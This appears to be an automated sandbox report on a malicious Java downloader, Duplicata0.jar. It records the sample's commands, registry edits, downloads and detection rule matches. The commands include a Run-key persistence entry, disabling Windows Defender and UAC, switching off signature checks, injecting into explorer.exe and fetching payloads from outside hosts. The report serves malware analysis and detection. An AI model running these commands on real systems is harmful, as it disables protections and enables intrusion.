VMRay Analyzer Report for Sample #866585
VMRay Analyzer 1.11.0

URI localhost Resolved_To Address 127.0.0.1

Process 2924 java.exe 1264 java.exe "C:\Program Files\Java\jre1.8.0_92\bin\java.exe" -jar "C:\Users\DSsDPMx042\Desktop\Duplicata0.jar" C:\Users\DSsDPMx042\Desktop c:\program files\java\jre1.8.0_92\bin\java.exe
Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Opened Opened Read_From Read_From Connected_To Connected_To Connected_To
Process 3064 regsvr32.exe 2924 regsvr32.exe regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96 C:\Users\DSsDPMx042\Desktop c:\windows\system32\regsvr32.exe
File program files\java\jre1.8.0_92\lib\rt.jar program files\java\jre1.8.0_92\lib\rt.jar c:\ c:\program files\java\jre1.8.0_92\lib\rt.jar jar
File program files\java\jre1.8.0_92\lib\ext\meta-index program files\java\jre1.8.0_92\lib\ext\meta-index c:\ c:\program files\java\jre1.8.0_92\lib\ext\meta-index 0_92\lib\ext\meta-index
File users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp c:\ c:\users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp timestamp MD5 9fffd4e723eebc43d03333c1a4413ab4 SHA1 5a93ce0f655c05c5318bfbdb488e6eceaf29d96e SHA256 48d355d323548fb06decc335335b6deb3155b593756826c6771ff9d25743ea63
File users\dssdpmx042\desktop\duplicata0.jar users\dssdpmx042\desktop\duplicata0.jar c:\ c:\users\dssdpmx042\desktop\duplicata0.jar jar
File program files\java\jre1.8.0_92\lib\meta-index program files\java\jre1.8.0_92\lib\meta-index c:\ c:\program files\java\jre1.8.0_92\lib\meta-index 0_92\lib\meta-index
File program files\java\jre1.8.0_92\lib\security\java.security program files\java\jre1.8.0_92\lib\security\java.security c:\ c:\program files\java\jre1.8.0_92\lib\security\java.security security
File users\public\n3eg\id users\public\n3eg\id c:\ c:\users\public\n3eg\id MD5 97558baebf6eb308ff83d8fe474e294a SHA1 954cfe56df08de38d177d12bab69170cf1674b03 SHA256 7a788184a2507c5de3f4cfc973810695d3ca41e29c6e90a21f87d419e1601c94
File users\public\n3eg\idw users\public\n3eg\idw c:\ c:\users\public\n3eg\idw MD5 26657d5ff9020d2abefe558796b99584 SHA1 6fb84aed32facd1299ee1e77c8fd2b1a6352669e SHA256 7b1a278f5abe8e9da907fc9c29dfd432d60dc76e17b0fabab659d2a508bc65c4
File program files\java\jre1.8.0_92\lib\net.properties program files\java\jre1.8.0_92\lib\net.properties c:\ c:\program files\java\jre1.8.0_92\lib\net.properties properties
File users\public\n3eg\n3eg1.zip users\public\n3eg\n3eg1.zip c:\ c:\users\public\n3eg\n3eg1.zip zip MD5 16dbf6ce67e389a442ce8d032637654d SHA1 0b4068e0d543bb6cd9e549df207a3069a7e18388 SHA256 555a58f9a1d235b075fa645a058a5b93215bd27432a4c8e120f4310eb8655c47
File users\public\n3eg\n3eg2.zip users\public\n3eg\n3eg2.zip c:\ c:\users\public\n3eg\n3eg2.zip zip MD5 7088647800a215d2d77570ff3f999e74 SHA1 aad42e745069e801900a01f1fd897b82067f988e SHA256 572d8553fc28c6cdd680aa782cd73d2e6cbd7316145f060a3986a7ce0e40515e
File users\public\n3eg\n3eg4.zip users\public\n3eg\n3eg4.zip c:\ c:\users\public\n3eg\n3eg4.zip zip MD5 d5a2e7e6f866f119cd9fe3b3d6232acc SHA1 8af3b0406e8e6780cea28a603f46ef2eec7d2b9f SHA256 09973947c6b59a27d5adf9ce1d0b2edf342a18ae746d58dec72cc24b31d46a59
File users\public\n3eg\ljkg4 users\public\n3eg\ljkg4 c:\ c:\users\public\n3eg\ljkg4 MD5 9c413a78860adeb716ce3a6c9c90aeb3 SHA1 3b12a0e1afae98db7e665ea6bc45b1c7bf875b30 SHA256 8be47f70911221c257dd2def3ce76a1d4db6d26685de6fbc16409baeb8ba8722
File users\public\n3eg\ljkg1 users\public\n3eg\ljkg1 c:\ c:\users\public\n3eg\ljkg1 MD5 8eaa07e05c7f46d1c2949d11c9ba645d SHA1 1dc6bc4043ce00b856bfe462147064b34ae16dc2 SHA256 866218b20d0ebcae237e288cf8616d7a9293c974a1df14ec8f7c37b7ee0dd7e4
File users\public\n3eg\ljkg2 users\public\n3eg\ljkg2 c:\ c:\users\public\n3eg\ljkg2 MD5 23adce0295127671e5bc3c4c9d1e2eb7 SHA1 cf28f7c38c1a3e17458e6b7eb1dc38baef72d290 SHA256 7cfbfff8aaf3bd0cc707e61a075a1f45644f422f9d1c55573edec637c27b6534
File STD_OUTPUT_HANDLE
File STD_ERROR_HANDLE
File STD_INPUT_HANDLE
File users\public\n3eg users\public\n3eg c:\ c:\users\public\n3eg
File Anonymous pipe
File Program Files\Java\jre1.8.0_92\bin\client\jvm.dll Program Files\Java\jre1.8.0_92\bin\client\jvm.dll C:\ C:\Program Files\Java\jre1.8.0_92\bin\client\jvm.dll dll
DNSRecord N3EErvtwsM URI N3EErvtwsM
DNSRecord adom2.com.br URI adom2.com.br
SocketAddress 80 TCP
NetworkSocket 80 TCP Contains SocketAddress 80
NetworkConnection HTTP 80
URI http://None/nosoanfhtympkl50tre/ljk32g1.txt Contains URI none

Process 3064 regsvr32.exe 2924 regsvr32.exe regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96 C:\Users\DSsDPMx042\Desktop c:\windows\system32\regsvr32.exe
Opened Opened Opened Opened Opened Opened Opened Opened Opened
Process 1264 explorer.exe 18446744073709551615 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe
WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER
WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER
File Users\Public\N3Eg\N3Eg2.51N3E Users\Public\N3Eg\N3Eg2.51N3E C:\ C:\Users\Public\N3Eg\N3Eg2.51N3E 51N3E
File Windows\system32\regsvr32.exe Windows\system32\regsvr32.exe C:\ C:\Windows\system32\regsvr32.exe exe

Process 1264 explorer.exe 18446744073709551615 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe
Created Created Created Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Read_From Read_From Read_From Read_From Connected_To Connected_To Connected_To
Process cmd /k "C:\Users\Public\N3Eg\N3E.vbs"
File users\public\n3eg\n3eg1.51n3e users\public\n3eg\n3eg1.51n3e c:\ c:\users\public\n3eg\n3eg1.51n3e 51n3e
File users\public\n3eg\wvs users\public\n3eg\wvs c:\ c:\users\public\n3eg\wvs MD5 f4314bbaf858170dd3b5d1610b3370fa SHA1 fb456dcb16fcac006136471acaf71089398f2063 SHA256 45e26aeb4a0e45265193e9293e88a93d9b3c89af4e401cb1812161c4568d0b51
File users\public\n3eg\idw users\public\n3eg\idw c:\ c:\users\public\n3eg\idw
File users\public\n3eg\idx users\public\n3eg\idx c:\ c:\users\public\n3eg\idx MD5 a26185275591cd0849899d86349265a0 SHA1 209b5d24d976b7399dd37ee9669c312ddc3da214 SHA256 7361213f5c9ebbdf90b6865202c7f02607e3d57ec9b070448dba250bef7061f4
File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs MD5 519b80fd9d6073f6034820a5c0f0241c SHA1 5d7d06d0b1100817dfccf7c87c824650da296fc1 SHA256 7ac2bab32a34ef844ac2a63864db4d238011723b81f4072f22b148a4535a56d8
File users\public\n3eg\id users\public\n3eg\id c:\ c:\users\public\n3eg\id
WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Borland\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER
WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE
WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes HKEY_LOCAL_MACHINE MS Shell Dlg 2 MS Shell Dlg 2
WinRegistryKey System\CurrentControlSet\Control\Keyboard Layouts\04090409 HKEY_LOCAL_MACHINE
WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER xacwe regsvr32.exe /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96 REG_SZ
WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE
File Users\Public\N3Eg\N3Eg4.51N3E Users\Public\N3Eg\N3Eg4.51N3E C:\ C:\Users\Public\N3Eg\N3Eg4.51N3E 51N3E
File Windows\Explorer.EXE Windows\Explorer.EXE C:\ C:\Windows\Explorer.EXE EXE
File
DNSRecord carvas32ltda.com URI carvas32ltda.com
DNSRecord carva32ssa.com URI carva32ssa.com
DNSRecord bandeivacomercial.com URI bandeivacomercial.com
DNSRecord bandeivacomercio.com URI bandeivacomercio.com
DNSRecord adom2.com.br
SocketAddress 187.191.100.112 80 TCP
NetworkSocket 187.191.100.112 80 TCP Contains SocketAddress 127.0.0.1 80
NetworkConnection HTTP 127.0.0.1 80
URI http://127.0.0.1/nosoanfhtympkl50tre/infx/s1/conta.php?chave=s3n4&url=N3EERVTWSM%20*%20%2032%20bits%20*%202626.5%20kb%20*%20%20*%20English%20(United%20States) Contains URI 127.0.0.1

Process 3832 cmd.exe 1264 cmd.exe cmd /k "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\cmd.exe
Opened Created Opened Opened Opened Opened Opened Opened
Process 3832 cmd.exe 1264 cmd.exe cmd /k "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\cmd.exe
Process C:\Users\Public\N3Eg\N3E.vbs
File STD_OUTPUT_HANDLE
File STD_INPUT_HANDLE
WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER
WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun
WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun
File Windows\system32\cmd.exe Windows\system32\cmd.exe C:\ C:\Windows\system32\cmd.exe exe
File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs

Process 3880 wscript.exe 3832 wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\wscript.exe
Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Enabled
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings Enabled
WinRegistryKey .vbs HKEY_CLASSES_ROOT
WinRegistryKey VBSFile\ScriptEngine HKEY_CLASSES_ROOT
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings LogSecuritySuccesses
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER LogSecuritySuccesses
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings TrustPolicy UseWINSAFER
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER TrustPolicy UseWINSAFER
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE Timeout DisplayLogo
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Timeout DisplayLogo
File Windows\System32\WScript.exe Windows\System32\WScript.exe C:\ C:\Windows\System32\WScript.exe exe
Process 3880 wscript.exe 3832 wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\wscript.exe

Process 1172 wscript.exe 3880 wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\N3Eg\N3E.vbs" uac C:\Windows\system32 c:\windows\system32\wscript.exe
Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened
Process sc
Process net
Process cmd
File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Enabled
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings Enabled
WinRegistryKey .vbs HKEY_CLASSES_ROOT
WinRegistryKey VBSFile\ScriptEngine HKEY_CLASSES_ROOT
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER LogSecuritySuccesses
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE LogSecuritySuccesses
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings TrustPolicy UseWINSAFER
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER TrustPolicy UseWINSAFER
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE Timeout DisplayLogo
WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Timeout DisplayLogo
WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE EnableLUA 0 REG_DWORD_LITTLE_ENDIAN
WinRegistryKey Software\Microsoft\Internet Explorer\Download HKEY_CURRENT_USER CheckExeSignatures no REG_SZ
WinRegistryKey Software\Microsoft\Security Center HKEY_LOCAL_MACHINE AntiVirusDisableNotify 1 REG_DWORD_LITTLE_ENDIAN
WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE ConsentPromptBehaviorAdmin 0 REG_DWORD_LITTLE_ENDIAN
WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE PromptOnSecureDesktop 0 REG_DWORD_LITTLE_ENDIAN
WinRegistryKey Software\Microsoft\Internet Explorer\Download HKEY_CURRENT_USER RunInvalidSignatures 00000001 REG_SZ
WinRegistryKey Software\Microsoft\Security Center HKEY_LOCAL_MACHINE UpdatesDisableNotify 1 REG_DWORD_LITTLE_ENDIAN
File Windows\System32\wscript.exe Windows\System32\wscript.exe C:\ C:\Windows\System32\wscript.exe exe
Process 1172 wscript.exe 3880 wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\N3Eg\N3E.vbs" uac C:\Windows\system32 c:\windows\system32\wscript.exe
File STD_OUTPUT_HANDLE

Process 2400 sc.exe 1172 sc.exe "C:\Windows\System32\sc.exe" config WinDefend start= disabled C:\Windows\system32 c:\windows\system32\sc.exe
Opened Opened
WinService WinDefend
File STD_OUTPUT_HANDLE

Process 2492 net1.exe 1712 net1.exe C:\Windows\system32\net1 localgroup HomeUsers /delete DSsDPMx042 C:\Windows\system32 c:\windows\system32\net1.exe
Opened Opened Opened
File STD_ERROR_HANDLE
File Windows\system32\net1.exe Windows\system32\net1.exe C:\ C:\Windows\system32\net1.exe exe

Process 1692 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k echo a > "C:\Users\Public\N3Eg\uc" C:\Windows\system32 c:\windows\system32\cmd.exe
Opened Opened Opened Opened Opened Opened Opened Opened
Process 1692 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k echo a > "C:\Users\Public\N3Eg\uc" C:\Windows\system32 c:\windows\system32\cmd.exe
File STD_OUTPUT_HANDLE
File STD_INPUT_HANDLE
File users\public\n3eg\uc users\public\n3eg\uc c:\ c:\users\public\n3eg\uc MD5 27ff7ea9ce50076cfc8e794d64957f7c SHA1 d765803318ad03df1a1fbdc66fd542945dd81a84 SHA256 885fa5c5cb5f80fdb414f1b3e0b94c4b1366db1ce83e82358c4cb67da2ab73e4
WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER
WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun
WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun
File Windows\System32\cmd.exe Windows\System32\cmd.exe C:\ C:\Windows\System32\cmd.exe exe

Process 1632 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\cmd.exe
Opened Created Opened Opened Opened Opened Opened Opened Opened
Process 1632 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\cmd.exe
Process 2540 shutdown.exe 1632 shutdown.exe shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\shutdown.exe
File users\public\n3eg\uc users\public\n3eg\uc c:\ c:\users\public\n3eg\uc
File STD_INPUT_HANDLE
File STD_OUTPUT_HANDLE
WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER
WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun
WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun

Process 1396 regsvr32.exe 1136 regsvr32.exe "C:\Windows\System32\regsvr32.exe" /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96 C:\Windows\system32 c:\windows\system32\regsvr32.exe
Opened Opened Opened Opened Opened Opened Opened Opened Opened
Process 1136 explorer.exe 1128 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe
WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER
WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER
File Windows\System32\regsvr32.exe Windows\System32\regsvr32.exe C:\ C:\Windows\System32\regsvr32.exe exe
File users\public\n3eg\n3eg1.51n3e users\public\n3eg\n3eg1.51n3e c:\ c:\users\public\n3eg\n3eg1.51n3e 51n3e

Process 1136 explorer.exe 1128 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe
Created Created Deleted Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Read_From Read_From Read_From Connected_To
File users\public\n3eg\wvs users\public\n3eg\wvs c:\ c:\users\public\n3eg\wvs
File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs
WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Borland\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER
WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE
WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER
WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE
WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes HKEY_LOCAL_MACHINE MS Shell Dlg 2 MS Shell Dlg 2
WinRegistryKey System\CurrentControlSet\Control\Keyboard Layouts\04090409 HKEY_LOCAL_MACHINE
DNSRecord carvas32ltda.com
DNSRecord carva32ssa.com
DNSRecord bandeivacomercial.com
DNSRecord bandeivacomercio.com

Analyzed Sample #866585
Malware Artifacts 866585
Sample-ID: #866585
Job-ID: #4875347
Duplicata0.jar reboot Job-ID: #4875347
This sample was analyzed by VMRay Analyzer 1.11.0 on a Windows 7 system
94 VTI Score based on VTI Database Version 2.3

Metadata of Sample File #866585
Submission-ID: #866585
C:\Users\DSsDPMx042\Desktop\Duplicata0.jar jar
MD5 53e9f702c6ca434311cc05f09acf1923
SHA1 fba04d13da22168a6f6d0e0a9d893b0938d4abbf
SHA256 a2b467819bd03974f8b4ac326d9d488eb80680ee43cea984e160922122f1f048
Opened_By VMRay Analyzer

Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "N3EErvtwsM". Perform DNS request
Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "adom2.com.br". Perform DNS request
Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "regsvr32.exe \s \"C:\Users\Public\N3Eg\N3Eg2.51N3E\" #96" starts with hidden window. Create process with hidden window
Anti Analysis VTI rule match with VTI rule score 1/5 vmray_dynamic_api_usage_by_api Resolve more than 50 APIs. Dynamic API usage
Process VTI rule match with VTI rule score 1/5 vmray_allocate_wx_page Allocate a page with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code. Allocate a page with write and execute permissions
Anti Analysis VTI rule match with VTI rule score 1/5 vmray_delay_execution_by_sleep One thread sleeps more than 5 minutes. Delay execution
Persistence VTI rule match with VTI rule score 1/5 vmray_install_startup_script_by_registry Add "regsvr32.exe /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96" to windows startup via registry. Install system startup script or application
Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "carvas32ltda.com". Perform DNS request
Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "carva32ssa.com". Perform DNS request
Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "bandeivacomercial.com". Perform DNS request
Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "bandeivacomercio.com". Perform DNS request
Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "cmd /k "C:\Users\Public\N3Eg\N3E.vbs"" starts with hidden window. Create process with hidden window
OS VTI rule match with VTI rule score 3/5 vmray_disable_uac_notification_by_registry Disable UAC notification. Modify system security configuration
Browser VTI rule match with VTI rule score 4/5 vmray_ie_disable_exe_signature_check Disable signature check for executables downloaded by Microsoft Internet Explorer. Change security related browser settings
OS VTI rule match with VTI rule score 3/5 vmray_disable_security_center_av_notifications_by_registry Disable Windows Security Center antivirus notification. Modify system security configuration
OS VTI rule match with VTI rule score 3/5 vmray_disable_security_center_warning_about_updates_by_registry Disable Windows Security Center warning about disabled system updates. Modify system security configuration
Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "sc" starts with hidden window. Create process with hidden window
Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "net" starts with hidden window. Create process with hidden window
OS VTI rule match with VTI rule score 3/5 vmray_disable_system_service Disable "Windows Defender Service" by ChangeServiceConfigW. Disable crucial system service
Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "cmd" starts with hidden window. Create process with hidden window
Injection VTI rule match with VTI rule score 3/5 vmray_modify_memory "c:\windows\system32\regsvr32.exe" modifies memory of "c:\windows\explorer.exe". Write into memory of another process
Injection VTI rule match with VTI rule score 3/5 vmray_create_remote_thread "c:\windows\system32\regsvr32.exe" creates thread in "c:\windows\explorer.exe". Modify control flow of another process
Network VTI rule match with VTI rule score 1/5 vmray_tcp_out_connection Outgoing TCP connection to host "None:80". Connect to remote host
Network VTI rule match with VTI rule score 1/5 vmray_tcp_out_connection Outgoing TCP connection to host "187.191.100.112:80". Connect to remote host
Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g1.txt". Download data
Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g2.txt". Download data
Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g4.txt". Download data
Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://127.0.0.1/nosoanfhtympkl50tre/infx/s1/conta.php?chave=s3n4&url=N3EERVTWSM%20*%20%2032%20bits%20*%202626.5%20kb%20*%20%20*%20English%20(United%20States)". Download data
Network VTI rule match with VTI rule score 1/5 establish_http_connection Remote address "None". Connect to HTTP server
Network VTI rule match with VTI rule score 1/5 establish_http_connection Remote address "127.0.0.1". Connect to HTTP server
PE VTI rule match with VTI rule score 1/5 vmray_drop_pe_file Drop file "c:\users\public\n3eg\ljkg4". Drop PE file
PE VTI rule match with VTI rule score 1/5 vmray_drop_pe_file Drop file "c:\users\public\n3eg\ljkg2". Drop PE file